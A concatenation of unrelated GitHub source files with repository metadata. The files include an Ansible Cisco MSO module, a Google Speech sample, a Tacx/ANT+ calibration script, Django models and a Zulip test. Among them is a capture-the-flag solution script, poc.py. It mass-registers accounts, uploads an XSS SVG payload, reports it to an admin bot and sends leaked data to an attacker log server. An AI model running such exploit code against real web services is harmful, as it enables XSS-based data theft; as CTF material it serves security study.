short_description: Manage Bridge Domains (BDs) in schema templates
description:
- Manage BDs in schema templates on Cisco ACI Multi-Site.
author:
- Dag Wieers (@dagwieers)
version_added: '2.8'
options:
schema:
description:
- The name of the schema.
type: str
required: yes
template:
description:
- The name of the template.
type: str
required: yes
bd:
description:
- The name of the BD to manage.
type: str
aliases: [ name ]
display_name:
description:
- The name as displayed on the MSO web interface.
type: str
vrf:
description:
- The VRF associated to this BD. This is required only when creating a new BD.
type: dict
suboptions:
name:
description:
- The name of the VRF to associate with.
required: true
type: str
schema:
description:
- The schema that defines the referenced VRF.
- If this parameter is unspecified, it defaults to the current schema.
type: str
template:
description:
- The template that defines the referenced VRF.
- If this parameter is unspecified, it defaults to the current template.
type: str
subnets:
description:
- The subnets associated to this BD.
type: list
suboptions:
subnet:
description:
- The IP range in CIDR notation.
type: str
required: true
aliases: [ ip ]
description:
description:
- The description of this subnet.
type: str
scope:
description:
- The scope of the subnet.
type: str
choices: [ private, public ]
shared:
description:
- Whether this subnet is shared between VRFs.
type: bool
no_default_gateway:
description:
- Whether this subnet has a default gateway.
type: bool
intersite_bum_traffic:
description:
- Whether to allow intersite BUM traffic.
type: bool
optimize_wan_bandwidth:
description:
- Whether to optimize WAN bandwidth.
type: bool
layer2_stretch:
description:
- Whether to enable L2 stretch.
type: bool
layer2_unknown_unicast:
description:
- Layer2 unknown unicast.
type: str
choices: [ flood, proxy ]
layer3_multicast:
description:
- Whether to enable L3 multicast.
type: bool
state:
description:
- Use C(present) or C(absent) for adding or removing.
- Use C(query) for listing an object or multiple objects.
type: str
choices: [ absent, present, query ]
default: present
extends_documentation_fragment: mso
'''
EXAMPLES = r'''
- name: Add a new BD
mso_schema_template_bd:
host: mso_host
username: admin
password: SomeSecretPassword
schema: Schema 1
template: Template 1
bd: BD 1
vrf:
name: VRF1
state: present
delegate_to: localhost
- name: Remove a BD
mso_schema_template_bd:
host: mso_host
username: admin
password: SomeSecretPassword
schema: Schema 1
template: Template 1
bd: BD1
state: absent
delegate_to: localhost
- name: Query a specific BD
mso_schema_template_bd:
host: mso_host
username: admin
password: SomeSecretPassword
schema: Schema 1
template: Template 1
bd: BD1
state: query
delegate_to: localhost
register: query_result
- name: Query all BDs
mso_schema_template_bd:
host: mso_host
username: admin
password: SomeSecretPassword
schema: Schema 1
template: Template 1
state: query
delegate_to: localhost
register: query_result
'''
RETURN = r'''
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.aci.mso import MSOModule, mso_argument_spec, mso_reference_spec, mso_subnet_spec
def main():
argument_spec = mso_argument_spec()
argument_spec.update(
schema=dict(type='str', required=True),
template=dict(type='str', required=True),
bd=dict(type='str', aliases=['name']), # This parameter is not required for querying all objects
display_name=dict(type='str'),
intersite_bum_traffic=dict(type='bool'),
optimize_wan_bandwidth=dict(type='bool'),
layer2_stretch=dict(type='bool'),
layer2_unknown_unicast=dict(type='str', choices=['flood', 'proxy']),
layer3_multicast=dict(type='bool'),
vrf=dict(type='dict', options=mso_reference_spec()),
subnets=dict(type='list', options=mso_subnet_spec()),
state=dict(type='str', default='present', choices=['absent', 'present', 'query']),
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
required_if=[
['state', 'absent', ['bd']],
['state', 'present', ['bd', 'vrf']],
],
)
schema = module.params['schema']
template = module.params['template']
bd = module.params['bd']
display_name = module.params['display_name']
intersite_bum_traffic = module.params['intersite_bum_traffic']
optimize_wan_bandwidth = module.params['optimize_wan_bandwidth']
layer2_stretch = module.params['layer2_stretch']
layer2_unknown_unicast = module.params['layer2_unknown_unicast']
layer3_multicast = module.params['layer3_multicast']
vrf = module.params['vrf']
subnets = module.params['subnets']
state = module.params['state']
mso = MSOModule(module)
# Get schema_id
schema_obj = mso.get_obj('schemas', displayName=schema)
if schema_obj:
schema_id = schema_obj['id']
else:
mso.fail_json(msg="Provided schema '{0}' does not exist".format(schema))
schema_path = 'schemas/{id}'.format(**schema_obj)
# Get template
templates = [t['name'] for t in schema_obj['templates']]
if template not in templates:
mso.fail_json(msg="Provided template '{0}' does not exist. Existing templates: {1}".format(template, ', '.join(templates)))
template_idx = templates.index(template)
    # Get BD
bds = [b['name'] for b in schema_obj['templates'][template_idx]['bds']]
if bd is not None and bd in bds:
bd_idx = bds.index(bd)
mso.existing = schema_obj['templates'][template_idx]['bds'][bd_idx]
if state == 'query':
if bd is None:
mso.existing = schema_obj['templates'][template_idx]['bds']
elif not mso.existing:
mso.fail_json(msg="BD '{bd}' not found".format(bd=bd))
mso.exit_json()
bds_path = '/templates/{0}/bds'.format(template)
bd_path = '/templates/{0}/bds/{1}'.format(template, bd)
ops = []
mso.previous = mso.existing
if state == 'absent':
if mso.existing:
mso.sent = mso.existing = {}
ops.append(dict(op='remove', path=bd_path))
elif state == 'present':
vrf_ref = mso.make_reference(vrf, 'vrf', schema_id, template)
subnets = mso.make_subnets(subnets)
if display_name is None and not mso.existing:
display_name = bd
if subnets is None and not mso.existing:
subnets = []
payload = dict(
name=bd,
displayName=display_name,
intersiteBumTrafficAllow=intersite_bum_traffic,
optimizeWanBandwidth=optimize_wan_bandwidth,
l2UnknownUnicast=layer2_unknown_unicast,
l2Stretch=layer2_stretch,
l3MCast=layer3_multicast,
subnets=subnets,
vrfRef=vrf_ref,
)
mso.sanitize(payload, collate=True)
if mso.existing:
ops.append(dict(op='replace', path=bd_path, value=mso.sent))
else:
ops.append(dict(op='add', path=bds_path + '/-', value=mso.sent))
mso.existing = mso.proposed
if not module.check_mode:
mso.request(schema_path, method='PATCH', data=ops)
mso.exit_json()
if __name__ == "__main__":
main()
| {
"content_hash": "ed0eb11c2c9cae64cd975aeff326da49",
"timestamp": "",
"source": "github",
"line_count": 289,
"max_line_length": 131,
"avg_line_length": 28.5121107266436,
"alnum_prop": 0.6192961165048544,
"repo_name": "thaim/ansible",
"id": "72d5f9c7b371e2d3355ad4fb6f27c2d64fae6718",
"size": "8441",
"binary": false,
"copies": "5",
"ref": "refs/heads/fix-broken-link",
"path": "lib/ansible/modules/network/aci/mso_schema_template_bd.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7"
},
{
"name": "Shell",
"bytes": "246"
}
],
"symlink_target": ""
} |
# [START speech_v2_generated_Speech_CreatePhraseSet_sync]
from google.cloud import speech_v2
def sample_create_phrase_set():
# Create a client
client = speech_v2.SpeechClient()
# Initialize request argument(s)
request = speech_v2.CreatePhraseSetRequest(
parent="parent_value",
)
# Make the request
operation = client.create_phrase_set(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
# [END speech_v2_generated_Speech_CreatePhraseSet_sync]
| {
"content_hash": "056d56d76e545a3f563e5eeb5e752e3b",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 57,
"avg_line_length": 22.782608695652176,
"alnum_prop": 0.6908396946564885,
"repo_name": "googleapis/python-speech",
"id": "c311d648c15f360f9e1e63f74cc5813013ee07c8",
"size": "1904",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "samples/generated_samples/speech_v2_generated_speech_create_phrase_set_sync.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2050"
},
{
"name": "Python",
"bytes": "2077065"
},
{
"name": "Shell",
"bytes": "30660"
}
],
"symlink_target": ""
} |
import ant, os, usb.core, time, binascii, T1932_calibration, sys, glob, serial
import Tkinter as tkinter
def update_status(label, status):
label.config(text=status)
window.update_idletasks()
window.update()
window = tkinter.Tk()
window.title("Tacx calibration")
window.geometry("600x300")
tkinter.Label(window, text="Status: ").grid(row=1,column=1, sticky="E")
tkinter.Label(window, text="Calibrated: ").grid(row=2,column=1, sticky="E")
tkinter.Label(window, text="Resistance Level: ").grid(row=3,column=1, sticky="E")
tkinter.Label(window, text="Speed: ").grid(row=4,column=1, sticky="E")
tkinter.Label(window, text="Power: ").grid(row=5,column=1, sticky="E")
tkinter.Label(window, text="Instructions: ").grid(row=6,column=1, sticky="E")
status_label = tkinter.Label(window, text="None")
status_label.grid(row=1,column=2, sticky="W")
calibrated_label = tkinter.Label(window, text="False")
calibrated_label.grid(row=2,column=2, sticky="W")
resistance_label = tkinter.Label(window, text="None")
resistance_label.grid(row=3,column=2, sticky="W")
speed_label = tkinter.Label(window, text="None")
speed_label.grid(row=4,column=2, sticky="W")
power_label = tkinter.Label(window, text="None")
power_label.grid(row=5,column=2, sticky="W")
instructions_label = tkinter.Label(window, text="None")
instructions_label.grid(row=6,column=2, sticky="W")
window.update_idletasks()
window.update()
product=0
idpl = [0x1932, 0x1942]#iflow, fortius
for idp in idpl:
dev = usb.core.find(idVendor=0x3561, idProduct=idp) #find iflow device
if dev != None:
product=idp
break
if product == 0:
print "Trainer not found"
sys.exit()
#initialise TACX USB device
byte_ints = [2,0,0,0] # will not read cadence until initialisation byte is sent
byte_str = "".join(chr(n) for n in byte_ints)
dev.write(0x02,byte_str)
time.sleep(1)
###windows###
if os.name == 'nt':
found_available_ant_stick= True
try:
dev_ant = usb.core.find(idVendor=0x0fcf, idProduct=0x1009) #get ANT+ stick (garmin)
dev_ant.set_configuration() #set active configuration
try:#check if in use
stringl=["a4 01 4a 00 ef 00 00"]#reset system
            ant.send(stringl, dev_ant, False)
print "Using Garmin dongle..."
except usb.core.USBError:
print "Garmin Device is in use"
found_available_ant_stick = False
except AttributeError:
print "No Garmin Device found"
found_available_ant_stick = False
if found_available_ant_stick == False:
found_available_ant_stick = True
try:
dev_ant = usb.core.find(idVendor=0x0fcf, idProduct=0x1008) #get ANT+ stick (suunto)
dev_ant.set_configuration() #set active configuration
try:#check if in use
stringl=["a4 01 4a 00 ef 00 00"]#reset system
ant.send(stringl, dev_ant, False)
print "Using Suunto dongle..."
except usb.core.USBError:
print "Suunto Device is in use"
found_available_ant_stick = False
except AttributeError:
print "No Suunto Device found"
found_available_ant_stick = False
if found_available_ant_stick == False:
print "No available ANT+ device. Retry after quitting Garmin Express or other application that uses ANT+. If still fails then remove dongles for 10s then reinsert"
sys.exit()
###Linux###
elif os.name == 'posix':
#Find ANT+ USB stick on serial (Linux)
ant_stick_found = False
for p in glob.glob('/dev/ttyUSB*'):
dev_ant = serial.Serial(p, 19200, rtscts=True,dsrdtr=True)
dev_ant.timeout = 0.1
dev_ant.write(binascii.unhexlify("a4014a00ef0000")) #probe with reset command
reply = binascii.hexlify(dev_ant.read(size=256))
if reply == "a4016f20ea" or reply == "a4016f00ca":#found ANT+ stick
serial_port=p
ant_stick_found = True
else: dev_ant.close()#not correct reply to reset
if ant_stick_found == True : break
if ant_stick_found == False:
print 'Could not find ANT+ device. Check output of "lsusb | grep 0fcf" and "ls /dev/ttyUSB*"'
sys.exit()
else:
print "OS not Supported"
sys.exit()
ant.calibrate(dev_ant)#calibrate ANT+ dongle
#calibrate as power sensor
string=[
"a4 03 42 00 00 00 e5 00 00", #42 assign channel
"a4 05 51 00 00 00 0b 00 fb 00 00", #51 set channel id, 0b device=power sensor
"a4 02 45 00 39 da 00 00", #45 channel freq
"a4 03 43 00 f6 1f 0d 00 00", #43 msg period
"a4 02 71 00 00 d7 00 00", #71 Set Proximity Search chann number 0 search threshold 0
"a4 02 63 00 0a cf 00 00", #63 low priority search channel number 0 timeout 0
"a4 02 44 00 02 e0 00 00", #44 Host Command/Response
"a4 01 4b 00 ee 00 00" #4b ANT_OpenChannel message ID channel = 0 D00001229_Fitness_Modules_ANT+_Application_Note_Rev_3.0.pdf
]
ant.send(string, dev_ant, True)
power_meter = False
calibrated = False
packets_rx=0
resistance_level=0
target_power=0
power=0
speed=0
try:
while True:
reply = {}
last_measured_time = time.time() * 1000
#add wait so we only send every 250ms
try:
#get power data
read_val = binascii.hexlify(dev_ant.read(0x81,64))
if read_val[8:10]=="10":#a4 09 4e 00 10 ec ff 00 be 4e 00 00 10 #10 power page be 4e accumulated power 00 00 iunstant power
power = int(read_val[22:24],16)*16 + int(read_val[20:22],16)
print read_val, power
power_meter = True
elif read_val[0:10]=="a4094f0001":#calibration response
if read_val[10:12]=="ac":
update_status(status_label, "Calibration successful")
update_status(instructions_label, "Resume pedalling")
calibrated = True
update_status(calibrated_label, "True")
elif read_val[10:12]=="af":
update_status(status_label, "Calibration failed")
else:
update_status(status_label, "Calibration unknown response")
if power_meter:
packets_rx += 1
if not calibrated and packets_rx<40:
update_status(status_label, "Power data received - waiting to calibrate")
update_status(instructions_label, "Keep pedalling")
if packets_rx == 40:
update_status(status_label, "Starting calibration")
update_status(instructions_label, "STOP PEDALLING- power meter calibration in 10 seconds.\nPut pedals into position as instructed by your power meter manufacturer")
elif packets_rx == 80:
update_status(status_label, "Calibrating...")
update_status(instructions_label, "Do not pedal")
ant.send(["a4 09 4f 00 01 aa ff ff ff ff ff ff 49 00 00"], dev_ant, True)
else:
update_status(status_label, "No data from power meter yet")
update_status(instructions_label, "Keep pedalling")
#receive data from trainer
data = dev.read(0x82,64) #get data from device
#print "TRAINER",data
if len(data)>40:
fs = int(data[33])<<8 | int(data[32])
speed = round(fs/2.8054/100,1)#speed kph
#send data to trainer
r6=int(T1932_calibration.reslist[resistance_level])>>8 & 0xff #byte6
r5=int(T1932_calibration.reslist[resistance_level]) & 0xff #byte 5
#echo pedal cadence back to trainer
if len(data) > 40:
pedecho = data[42]
else:
pedecho = 0
byte_ints = [0x01, 0x08, 0x01, 0x00, r5, r6, pedecho, 0x00 ,0x02, 0x52, 0x10, 0x04]
byte_str = "".join(chr(n) for n in byte_ints)
dev.write(0x02,byte_str)#send data to device
if packets_rx % 50 == 0 and packets_rx > 150:
target_power += 50
if target_power == 500:
target_power = 50
resistance_level += 1
if resistance_level == 14:
print "Power calibration file created"
sys.exit()
update_status(status_label, "Creating calibration file")
update_status(instructions_label, "Aim for a target power of %s watts. It doesn't matter if you don't hit it exactly or can't achieve it at all!" % target_power)
update_status(resistance_label, "%s" % resistance_level)
update_status(speed_label, "%skph" % speed)
update_status(power_label, "%sW" % power)
else:
update_status(status_label, "Trainer possibly not powered up")
except usb.core.USBError:
update_status(status_label, "No data received from power meter")
update_status(instructions_label, "Start pedalling")
power_meter = False
time_to_process_loop = time.time() * 1000 - last_measured_time
sleep_time = 0.25 - (time_to_process_loop)/1000
if sleep_time < 0: sleep_time = 0
time.sleep(sleep_time)
except KeyboardInterrupt: # interrupt power data sending with ctrl c, make sure script continues to reset device
pass
ant.send(["a4 01 4a 00 ef 00 00"],dev_ant, False)#reset ANT+ dongle
| {
"content_hash": "2a7537a600ded6eeae2aa8cd0c0956b5",
"timestamp": "",
"source": "github",
"line_count": 233,
"max_line_length": 185,
"avg_line_length": 37.87982832618026,
"alnum_prop": 0.6571493315205076,
"repo_name": "john-38787364/antifier",
"id": "db6d26e5db9fb7c7d5bc1f4cd9a8489203529513",
"size": "8826",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "old-scripts/power_curve.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "648"
},
{
"name": "Python",
"bytes": "113853"
},
{
"name": "Shell",
"bytes": "2016"
}
],
"symlink_target": ""
} |
from __future__ import print_function
import re
from collections import defaultdict
import os
import sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))
from zerver.lib.user_agent import parse_user_agent
user_agents_parsed = defaultdict(int) # type: Dict[str, int]
user_agents_path = os.path.join(os.path.dirname(__file__), "user_agents_unique")
parse_errors = 0
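# Each input line is expected to look like (illustrative):
#   123 "Mozilla/5.0 (X11; Linux x86_64) ..."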
for line in open(user_agents_path).readlines():
line = line.strip()
match = re.match('^(?P<count>[0-9]+) "(?P<user_agent>.*)"$', line)
if match is None:
print(line)
continue
groupdict = match.groupdict()
count = groupdict["count"]
user_agent = groupdict["user_agent"]
ret = parse_user_agent(user_agent)
if ret is None:
print("parse error", line)
parse_errors += 1
continue
user_agents_parsed[ret["name"]] += int(count)
for key in user_agents_parsed:
print(" ", key, user_agents_parsed[key])
print("%s parse errors!" % (parse_errors,))
| {
"content_hash": "6ab9cc8dacbe10ac84a027069a59ac06",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 80,
"avg_line_length": 30.424242424242426,
"alnum_prop": 0.647410358565737,
"repo_name": "Frouk/zulip",
"id": "78aa1c5acd0bd3cd20a7baedd4ff3be2358c81a3",
"size": "1029",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tools/test_user_agent_parsing.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "164"
},
{
"name": "CSS",
"bytes": "183514"
},
{
"name": "CoffeeScript",
"bytes": "18435"
},
{
"name": "Groovy",
"bytes": "5516"
},
{
"name": "HTML",
"bytes": "395036"
},
{
"name": "JavaScript",
"bytes": "1582587"
},
{
"name": "Nginx",
"bytes": "1228"
},
{
"name": "PHP",
"bytes": "18930"
},
{
"name": "Pascal",
"bytes": "1113"
},
{
"name": "Perl",
"bytes": "383634"
},
{
"name": "Puppet",
"bytes": "96085"
},
{
"name": "Python",
"bytes": "1984569"
},
{
"name": "Ruby",
"bytes": "255867"
},
{
"name": "Shell",
"bytes": "33353"
}
],
"symlink_target": ""
} |
import requests
import re
import json
import sys
import argparse
import concurrent.futures
import random
def updateJSON():
with open(FILE, 'w') as file:
json.dump(USERS, file, indent=2)
def murl(path):
return 'https://%s%s' % (DOMAIN, path)
def register(i, sess, csrf):
sess.post(murl('/register'), data={
"username": ACC_PREFIX + str(i),
"password": ACC_PASSWORD,
"_csrf": csrf
}, allow_redirects=False)
    # Note: the per-account session entries are (re)built by refreshCookies(), so nothing is recorded here
def report(id):
r = requests.post(murl('/report'), data={
'fileid': id + '&preview=1'
})
print('Reported: %s' % r.text)
def registerAll():
sess = requests.Session()
r = sess.get(murl('/login')).text
csrf = re.findall(r'"_csrf" value="([^"]+)', r)[0]
with concurrent.futures.ThreadPoolExecutor(max_workers=THREADS) as executor:
for i in range(0, ACCOUNT_NO):
executor.submit(register, i, sess, csrf)
def login(i):
sess = requests.Session()
r = sess.get(murl('/login')).text
csrf = re.findall(r'"_csrf" value="([^"]+)', r)[0]
r = sess.post(murl('/login'), data={
"username": ACC_PREFIX + str(i),
"password": ACC_PASSWORD,
"_csrf": csrf
});
uid = re.findall(r'const user_id = (\d+);', r.text)[0]
return int(uid), sess.cookies['connect.sid'], csrf
def upload(csrf, file, cookie):
r = requests.post(murl('/upload'), files={
'file': open(file, 'rb')
}, data={
'visibility': 'public',
'_csrf': csrf
}, headers={
'Cookie': 'connect.sid=' + cookie
}, allow_redirects=False)
return re.findall(r'#file-(\d+)', r.headers['location'])[0]
def upload2(csrf, data, cookie):
r = requests.post(murl('/upload'), files={
'file': ('send_poc.svg', data)
}, data={
'visibility': 'public',
'_csrf': csrf
}, headers={
'Cookie': 'connect.sid=' + cookie
}, allow_redirects=False)
return re.findall(r'#file-(\d+)', r.headers['location'])[0]
def get_files(cookie):
return json.loads(requests.get(murl('/user/files'), headers={
'Cookie': 'connect.sid=' + cookie
}).text)
def share(file_id, uids, csrf, cookie):
r = requests.post(murl('/file/share'), headers={
'x-csrf-token': csrf,
'cookie': 'connect.sid=' + cookie
},json={
'to': uids,
'file_id': file_id
})
def refreshCookieThread(i, doUpload):
uid, cookie, csrf = login(i)
USERS['users'][i] = [i, uid, cookie, csrf]
if doUpload:
upload(csrf,XSS_FILE,cookie)
def refreshCookies(doUpload=False):
if len(USERS['users']) < ACCOUNT_NO:
USERS['users'] = [None]*ACCOUNT_NO
doUpload = True
with concurrent.futures.ThreadPoolExecutor(max_workers=THREADS) as executor:
for i in range(0, ACCOUNT_NO):
executor.submit(refreshCookieThread, i, doUpload)
updateJSON()
def shareFileToAll():
with concurrent.futures.ThreadPoolExecutor(max_workers=THREADS) as executor:
for _, uid, cookie, csrf in USERS['users']:
uids = list(map(lambda x: x[1], USERS['users']))
files = list(filter(lambda x: x['owner'] == uid, get_files(cookie)))
for i in range(0, ACCOUNT_NO, 100):
executor.submit(share, files[0]['id'], uids[i:i+100], csrf, cookie)
def createFilesMap():
domains = {}
for user, uid, cookie, csrf in USERS['users']:
files = get_files(cookie)
for file in files:
user_hash = file['docId'].split('-')[2]
domains[user_hash] = {'uid': uid, 'owner':file['owner'], 'file_id':file['id']}
USERS['domains'] = domains
def findDomainThread(cookie, uid, domain, domains):
if "found" in domains:
return
files = get_files(cookie)
for file in files:
user_hash = file['docId'].split('-')[2]
domains[user_hash] = {'uid': uid, 'owner':file['owner']}
if user_hash == domain:
domains["found"] = (uid,file['owner'])
return 1
def findDomain(domain):
domains = {}
with concurrent.futures.ThreadPoolExecutor(max_workers=THREADS) as executor:
for _, uid, cookie, _ in USERS['users']:
executor.submit(findDomainThread, cookie, uid, domain, domains)
if not "found" in domains:
print("Domain not found. Unique domains generated %d" % len(domains.keys()))
exit(1)
(uid, oid) = domains["found"]
owner = next(x for x in USERS['users'] if x[1] == oid)
user = next(x for x in USERS['users'] if x[1] == uid)
return (owner, user)
# updateJSON()
def findFileThread(owner, user, domain, result):
if "found" in result: return
owner_cookie = owner[2]
user_cookie = user[2]
file_id = upload(owner[3], XSS_FILE, owner_cookie)
if "found" in result: return
r = requests.get(murl('/file') + '?id=%s' % file_id, headers={
'cookie': 'connect.sid=' + user_cookie
},allow_redirects=False)
if r.headers['location'].startswith('//'+domain):
doc_url = 'https:' + r.headers['location']
if "found" in result: return
r2 = requests.get(doc_url, allow_redirects=False)
nonce, file_url = r2.cookies['nonce'], r2.headers['location']
if "found" in result: return
r2 = requests.get('https:' + file_url, headers={
'cookie': 'connect.sid=' + user_cookie
},allow_redirects=False)
real_doc_url = 'https:' + r2.headers['location']
result["found"] = (real_doc_url, nonce)
def findFile(owner, user, domain):
result = {}
with concurrent.futures.ThreadPoolExecutor(max_workers=6) as executor:
for _ in range(100):
executor.submit(findFileThread, owner, user, domain, result)
if not "found" in result: return None, None
return result["found"]
parser = argparse.ArgumentParser(description='Execute Proof of Concept')
parser.add_argument('--domain', required='--send' in sys.argv, type=str, help="Find collision. Add --send to send it to admin")
parser.add_argument('--prefix', type=str, help='Account prefix for --register and --reset')
parser.add_argument('--reset', action='store_true', default=False, help='Reset the dictionary')
parser.add_argument('--register', action='store_true', default=False, help='Register all accounts')
parser.add_argument('--refresh', action='store_true', default=False, help='Refresh session cookies')
parser.add_argument('--share', action='store_true', default=False, help='Share all files with each others')
parser.add_argument('--leak-domain', action='store_true', default=False, help="Leak flag's domain")
parser.add_argument('--send', action='store_true', default=False, help="Send poc to admin")
parser.add_argument('--log-server', required='--send' in sys.argv or '--leak-domain' in sys.argv, type=str, help="Log server for leaked stuff")
args = parser.parse_args()
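# Illustrative invocations (values are placeholders, see --help for details):
#   python poc.py --reset
#   python poc.py --leak-domain --log-server https://attacker.example
#   python poc.py --domain <leaked-document-domain> --send --log-server https://attacker.example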
DOMAIN = 'chall.secdriven.dev'
ACC_PREFIX = 'poc_' + str(random.randint(0,10000)) + "_"
ACC_PASSWORD = 's3creT-P4ss'
FILE = sys.path[0] + '/users.json'
XSS_FILE = sys.path[0] + '/xss.svg'
XSS_SEND_FILE = sys.path[0] + '/send_to_admin.svg'
ACCOUNT_NO = 400
THREADS = 24
SEND_TO_ADMIN = False
with open(FILE, 'r') as file:
USERS = json.load(file)
if args.leak_domain:
if args.refresh:
refreshCookies()
print("Refreshed cookies")
[_,_,cookie,csrf] = USERS['users'][0]
xss_file = open(XSS_SEND_FILE, 'r').read()
data = xss_file.replace('$LOG_SERVER', args.log_server)
file_id = upload2(csrf, data, cookie)
print("Uploaded file: %s" % file_id)
report(file_id)
exit(1)
if args.prefix:
ACC_PREFIX = args.prefix
if args.reset == True:
USERS = {"users": []}
registerAll()
print("Accounts registered with prefix: %s" % ACC_PREFIX)
refreshCookies(True)
print("Cookies refreshed & files uploaded")
shareFileToAll()
print("Files shared")
if args.register == True:
registerAll()
print("Accounts registered with prefix: %s" % ACC_PREFIX)
if args.refresh == True:
refreshCookies()
print("Cookies refreshed")
if args.share == True:
shareFileToAll()
print("Files shared")
if args.domain:
user_domain = args.domain.split('-')[2]
owner, user = findDomain(user_domain)
print("Found users (owner:%d, user:%d)" % (owner[1], user[1]))
doc_url, nonce = findFile(owner, user, args.domain)
print("Found doc_url %s nonce=%s" % (doc_url, nonce))
if args.send:
[_,_,cookie,csrf] = USERS['users'][0]
xss_file = open(XSS_SEND_FILE, 'r').read()
data = xss_file.replace('$DOC_URL', doc_url).replace('$NONCE', nonce).replace('$LOG_SERVER', args.log_server)
file_id = upload2(csrf,data,cookie)
print("Uploaded file: %s" % file_id)
report(file_id)
| {
"content_hash": "02fdc08fc0d341e1b2c822df42479956",
"timestamp": "",
"source": "github",
"line_count": 268,
"max_line_length": 143,
"avg_line_length": 31.152985074626866,
"alnum_prop": 0.6463049467002037,
"repo_name": "google/google-ctf",
"id": "9318d386fb40b6f9c167e4056169a9824a44440e",
"size": "8925",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "2021/quals/web-security-driven/solution/poc.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "AIDL",
"bytes": "508"
},
{
"name": "Assembly",
"bytes": "107617"
},
{
"name": "BASIC",
"bytes": "6068"
},
{
"name": "Batchfile",
"bytes": "1032"
},
{
"name": "Blade",
"bytes": "14530"
},
{
"name": "C",
"bytes": "1481904"
},
{
"name": "C++",
"bytes": "2139472"
},
{
"name": "CMake",
"bytes": "11595"
},
{
"name": "CSS",
"bytes": "172375"
},
{
"name": "Dart",
"bytes": "6282"
},
{
"name": "Dockerfile",
"bytes": "232352"
},
{
"name": "EJS",
"bytes": "92308"
},
{
"name": "Emacs Lisp",
"bytes": "2668"
},
{
"name": "GDB",
"bytes": "273"
},
{
"name": "GLSL",
"bytes": "33392"
},
{
"name": "Go",
"bytes": "3031142"
},
{
"name": "HTML",
"bytes": "467647"
},
{
"name": "Java",
"bytes": "174199"
},
{
"name": "JavaScript",
"bytes": "2643200"
},
{
"name": "Lua",
"bytes": "5944"
},
{
"name": "Makefile",
"bytes": "149152"
},
{
"name": "NSIS",
"bytes": "2800"
},
{
"name": "Nix",
"bytes": "139"
},
{
"name": "PHP",
"bytes": "311900"
},
{
"name": "Perl",
"bytes": "32742"
},
{
"name": "Pug",
"bytes": "8752"
},
{
"name": "Python",
"bytes": "1756592"
},
{
"name": "Red",
"bytes": "188"
},
{
"name": "Rust",
"bytes": "541267"
},
{
"name": "Sage",
"bytes": "39814"
},
{
"name": "Shell",
"bytes": "382149"
},
{
"name": "Smali",
"bytes": "2316656"
},
{
"name": "Starlark",
"bytes": "8216"
},
{
"name": "SystemVerilog",
"bytes": "16466"
},
{
"name": "VCL",
"bytes": "895"
},
{
"name": "Verilog",
"bytes": "7230"
},
{
"name": "Vim Script",
"bytes": "890"
},
{
"name": "Vue",
"bytes": "10248"
}
],
"symlink_target": ""
} |
from django.db import models
class Question(models.Model):
question_text = models.CharField(max_length=200)
pub_date = models.DateTimeField('date published')
def __str__(self):
return self.question_text
class Choice(models.Model):
question = models.ForeignKey(Question, on_delete=models.CASCADE, related_name='choices')
choice_text = models.CharField(max_length=200)
votes = models.IntegerField(default=0)
def __str__(self):
return self.choice_text
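# Illustrative usage of the reverse relation defined by related_name='choices':
#   question = Question.objects.get(pk=1)
#   question.choices.all()  # all Choice objects belonging to this question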
| {
"content_hash": "ecaecd5a752b9b8b0acd3494160427e4",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 92,
"avg_line_length": 27.72222222222222,
"alnum_prop": 0.6993987975951904,
"repo_name": "danicarrion/pyrestcli",
"id": "3d61611c505d2ec73a6414ea9572cf41badabf5b",
"size": "499",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/restserver/polls/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "38706"
}
],
"symlink_target": ""
} |
from feti.models.campus import Campus
from feti.models.course import Course
from django.core.management.base import BaseCommand
__author__ = 'Rizky Maulana Nugraha "lucernae" <[email protected]>'
__date__ = '16/07/15'
class Command(BaseCommand):
help = 'Update long description in Campus and Course models'
def handle(self, *args, **options):
self.stdout.write('Updating long description for Campus...')
for campus in Campus.objects.all():
campus.save()
self.stdout.write('Update completed.')
self.stdout.write('---------------------------------------')
self.stdout.write('Updating long description for Course...')
for course in Course.objects.all():
course.save()
self.stdout.write('Update completed.')
| {
"content_hash": "4b1afc2530f12cfd3b2a402db434b568",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 70,
"avg_line_length": 38.04761904761905,
"alnum_prop": 0.6345431789737171,
"repo_name": "cchristelis/feti",
"id": "9b34a6e97351320cbe1bf63ec9902325bd950b39",
"size": "814",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "django_project/feti/management/commands/updatelongdescription.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "66178"
},
{
"name": "HTML",
"bytes": "3411827"
},
{
"name": "JavaScript",
"bytes": "525391"
},
{
"name": "Makefile",
"bytes": "16513"
},
{
"name": "PLpgSQL",
"bytes": "9805987"
},
{
"name": "Python",
"bytes": "372712"
},
{
"name": "Shell",
"bytes": "2539"
}
],
"symlink_target": ""
} |
"""Wrapper for running a fleetspeak client in a virtualenv setup.
This script is meant to be used for development.
Requirements for running this script:
* Running from a virtualenv.
* PIP package `fleetspeak-client-bin` is installed.
* `grr_config_updater initialize` has been run.
* Fleetspeak has been enabled.
"""
import os
import platform
import subprocess
from absl import app
from google.protobuf import text_format
from grr_response_core import config
from grr_response_core.lib import config_lib
from grr_response_core.lib import package
from grr_response_core.lib import utils
from grr_response_core.lib.util import temp
